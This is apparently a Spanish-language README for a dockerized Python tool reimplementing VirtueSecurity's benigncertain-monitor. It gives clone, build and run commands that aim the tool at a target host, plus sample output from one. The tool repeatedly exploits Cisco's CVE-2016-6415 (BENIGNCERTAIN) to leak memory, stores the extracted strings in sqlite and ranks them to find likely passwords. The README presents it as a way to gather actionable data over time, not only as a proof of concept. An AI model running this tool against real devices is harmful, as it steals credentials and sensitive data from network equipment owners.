
Reimplementación del benigncertain-monitor de VirtueSecurity
Reimplementación del benigncertain-monitor de VirtueSecurity. No tiene todas las mismas opciones de payload que el original, pero reemplaza el binario bc-id con una mejor prueba de concepto de Ross Bradley que puede ampliarse si es necesario.
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
El servicio sondeará continuamente el servicio vulnerable, extraerá cadenas ascii de la memoria, almacenará las cadenas en una base de datos sqlite local y mostrará las cadenas observadas con mayor frecuencia:
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
Este es un script de Python dockerizado que filtra continuamente la memoria de un objetivo vulnerable al exploit BENIGNCERTAIN de Cisco CVE-2016-6415.
El script sondea el servicio vulnerable a lo largo del tiempo para identificar posibles contraseñas y otra información potencialmente sensible. Esto se puede utilizar para recolectar datos procesables durante un período de tiempo, en lugar de solo una prueba de concepto del exploit.